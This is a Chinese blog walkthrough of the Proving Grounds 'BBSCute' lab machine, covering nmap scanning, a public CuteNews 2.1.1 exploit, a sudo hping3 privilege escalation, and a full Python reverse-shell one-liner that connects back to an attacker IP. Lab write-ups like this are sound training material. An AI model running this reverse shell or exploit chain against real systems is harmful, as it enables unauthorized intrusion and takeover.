PG::BBSCute

最新推荐文章于 2023-07-23 01:36:20 发布
最新推荐文章于 2023-07-23 01:36:20 发布
阅读量91 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128342511
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.58.128
image.png
nmap -Pn -p 22,80,88,110,995 -sCV 192.168.58.128
image.png
80端口是Debian的默认页面,尝试对路径进行爆破。
image.png
得到登录页面,使用了“CuteNews 2.1.1”
image.png
在exploit-db中搜索“CuteNews”
image.png
https://www.exploit-db.com/exploits/48800
直接下载脚本使用
image.png
使用过程出现错误
image.png
看一下源码,需要把/CuteNews路径删除
image.png
反弹shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.58.200”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’
image.png
使用sudo -l,发现可以提权
image.png
https://gtfobins.github.io/gtfobins/hping3/
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
slick-pg:PostgreSQLSlick扩展
02-05
光滑pg PostgreSQL扩展,支持一系列pg数据类型和相关的运算符/函数。 当前支持的pg类型: 阵列 约会时间 枚举 范围 Hstore 树 JSON格式 Inet / MacAddr text搜寻 postgis几何 当前支持的pg功能: 继承 复合类型...
pg:Python OpenGL图形框架
05-04
pg:Python图形框架 pg是用于Python的轻量级高级OpenGL图形框架。 这是一项正在进行的工作。 教程 此处提供了基本教程: 特征 许多OpenGL应用程序具有许多共同点,但是使用OpenGL时涉及很多样板。 这种高级框架使您...
VULNHUB之BBS (cute): 1.0.1
鲨鱼辣椒的博客
07-25 398
好久没写文章了,开始是学期末比较忙,后来放假了说实话有点懈怠也比较迷茫。感觉自己要学的东西很多却又不知道该从哪里下手。写文章就暂时放下了,最近整理了一下自己,文章还是要写,仅作为自己慢慢成长路上的一个记录也好。好了,不多说开始今天的练习 信息搜集 扫描网段发现目标主机IP地址 扫描IP地址发现开启的服务以及端口 发现开启的服务寻找漏洞 SSH 看见ssh第一反应就是暴力破解但是也不能盲目,后面有http可以在web页面上看是否能搜集到一些账号相关的敏感信息可以大大加强我们成功爆破的概率(
OSCP BBSCute 详细教学
m0_52545432的博客
05-08 238
BBSCute靶机
OSCP靶场系列-Esay-BBSCute保姆级
最新发布
杳若的博客
07-23 5628
BBSCute保姆级靶场流程
VulnHub靶场之BBS (cute): 1.0.1
A_dmin的博客
10-04 865
VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2,搜索一下相关漏洞,三个利用方式: 看了一下,第一个要手动加载啥的,也就是说msf中没有加载的,,,, 第三个是文件上传,但是验证码好像有问题,没尝试,,直接使用大佬的exploit了,,, 运行得到简单shell: 开启python简单http服务: 上传shell.php文件: 运行shell
vulnhub-BBS(cute)1.0.1
qq_41810304的博客
09-26 505
前言: 很长时间没有做过靶机了,现在又跑回来做一做。确切的说本人就是菜鸡本菜了,因为困难靶机做不了,中等靶机有难度,简单靶机又嫌弃,想来多少有些可笑,总想去提升,却总感觉在原地踏步。看了一些推荐,我又跑去xctf攻防世界注册了个账号刷刷ctf题,确实发现了很多知识盲区,也知道有很多东西要学,却又不知道如何学起。书中的来终觉浅,又缺乏实践,现在我呀,就像一个无头的苍蝇到处瞎撞。 好了,言归正传,这次靶机名称见题目,下载链接就不放了。文中内容仅供学习。 kali:192.16...
jsp分页标签pg:pager标签运用
y_dzaichirou的博客
12-22 2688
pager-taglib是一个用jsp标签库实现分页的工具,在它的demo中有实现好的各种常见分页方式,使用时只需pager-taglib.jar包即可,Pager会在给出的URL后面加上"?page.offset="来标识当前偏移量,使用时在jsp页面将pager-taglib的标签库引入:      标签介绍 1. :一切子标签都在它里面工作 省略>
pg:pager标签运用
Forever_YouSay
12-04 7063
pager-taglib是一个用jsp标签库实现分页的工具,在它的demo中有实现好的各种常见分页方式,使用时只需pager-taglib.jar包即可,Pager会在给出的URL后面加上"?page.offset="来标识当前偏移量,使用时在jsp页面将pager-taglib的标签库引入:      标签介绍 1. :一切子标签都在它里面工作 省略> items:
pg:错误: 关系 “xxx_xx“ 不存在
兔兔那麽可@
07-30 3209
修改数据库解决问题
PG::Error: ERROR: permission denied to create database
飞鸟与鱼
03-14 7705
使用普用户创建数据库时候 PG::Error: ERROR: permission denied to create database 解决方式: 使用postgres 登录 sudo -u postgres psql postgres=# ALTER ROLE xxxx CREATEROLE CREATEDB; xxxx: 普通用户名称 赋予超级权限 ALTER ...
mojo-pg:Mojolicious PostgreSQL
02-05
6. 错误处理:在可能出现错误的地方,捕获 `Mojo::Pg::Error` 类型的异常。 在 `mojo-pg-master` 文件夹中,你可以找到 `mojo-pg` 模块的源代码,这包括了模块的定义、测试用例和文档。通过阅读源代码和测试用例,...
pg:使用 postgresql 的实用程序脚本
06-08
PG 常见 postgres 命令行操作的包装脚本。 安装 使用 : $ basher install juanibiapina/pg 或者克隆存储库并将bin文件夹添加到您的路径中。 命令 pg list : 列出数据库 pg copy <origin> <target> :制作数据库...
fastify-pg:固定PostgreSQL插件
05-03
依存关系:安装npm i fastify fastify-plugin fastify-pg pg --save用法const pg = require ( 'fastify-pg' ) 或者import pg from 'fastify-pg' 注册插件fastify . register ( pg , options ) 该插件将在具有以下...
ruby-pg:Ruby的PostgreSQL客户端库
01-30
**ruby-pg:Ruby的PostgreSQL客户端库** `ruby-pg`是Ruby编程语言中用于连接和操作PostgreSQL数据库的客户端库。它提供了一个全面的API,允许开发人员执行SQL查询,处理结果集,以及进行更复杂的数据库操作,如事务...
LiveDesign:PG项目
05-10
【LiveDesign:PG项目】是基于Java开发的一个项目,主要用于设计和实现动态原型。这个项目可能是一个用于图形用户界面(GUI)设计的工具,或者是一个帮助开发者快速构建和测试交互式设计的平台。"PG"可能是项目名称的...
todopy-pg:https的克隆
06-07
Python + Postgres + React TodoMVC 示例此应用程序采用 React TodoMVC 示例并添加了 Python 和 Postgres 后端。 所有更改都会立即存储在 Postgres(而不是上游示例中的浏览器 localStorage)中,然后通过 ...
wait-for-pg:等待postgres
05-08
正在安装全局安装wait-for-pg将安装wait-for-pg命令: # Using npmnpm install -g wait-for-pg# Using Yarnyarn global add wait-for-pg使用以下命令运行: wait-for-pgwait-for-pg也可以使用npx运行: npx wait-for...
Cannot resolve symbol 'pg:pager'
06-08
这个错误通常是由于没有正确引入PageTag库导致的。请确保在你的web应用程序中包含...<%@ taglib uri="http://displaytag.sf.net" prefix="pg" %> ``` 这将声明PageTag库中的pager标签。希望这可以帮助你解决这个问题!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值